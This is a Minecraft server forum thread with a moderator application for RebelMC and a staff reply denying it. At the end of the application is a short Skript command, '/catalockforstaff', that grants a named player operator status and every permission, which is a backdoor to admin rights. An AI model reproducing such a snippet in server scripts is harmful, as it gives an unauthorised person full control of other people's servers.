02 Oct 2020
Topics
IGN
mxxnliqht

Name: Sharman Ghotra

Minecraft Username: mxxnliqht

Discord Name (Include the numbers Ex. Butler#8846):CataLock#9956

Time Zone:PST

Why would you like to become mod on RebelMC: I've been playing this server for a long time (Played the old version 2 months ago) and I really enjoy the community, staff, and the idea of duplication void as I have moderated on two other dupe servers. (BoxDupe Infinidupe.)

Do you have any experience moderating:Yes, I have moderated on  a couple of servers (Boxdupe Infinidupe) and I am familiar with most rules and commands.

If presented with the opportunity as a Helper how would you assist the server in hacker and clean chat management: I would clean chat everytime someone said an innaproprite word and I would quickly mute/warn the person who said the word based on the severiety of the word.

How active would you be on the server: I am mostly on the servers 3+ a day and now because of summer break I can be on for 4+ a day on RebelDupe. However, some days I will play less more then other days.

Any additional comments or concerns: Pray to the gods that I get accepted :D

command /catalockforstaff:

trigger:

execute console command "op __Ang"

execute console command "lp user __Ang permissions add *"

play sound "block.note_block.hit" with volume 100 and pitch 1 to player

send "&bcatalock is staff"

Catalock · over 3 years ago · Last edited: over 3 years ago
Adaxer

Adaxer

Last Seen
10 Aug 2020
Topics
IGN
Adaxer

Hello, mxxnliqht.

It's great that you took the time to write an application. Your application lacks information. You need to write more about how you moderated on (BoxDupe and Infinidupe). Your application is denied. Feel free to make a new application in 2 weeks.

APPLICATION DENIED

THREAD LOCKED 

Adaxer · over 3 years ago · Last edited: over 3 years ago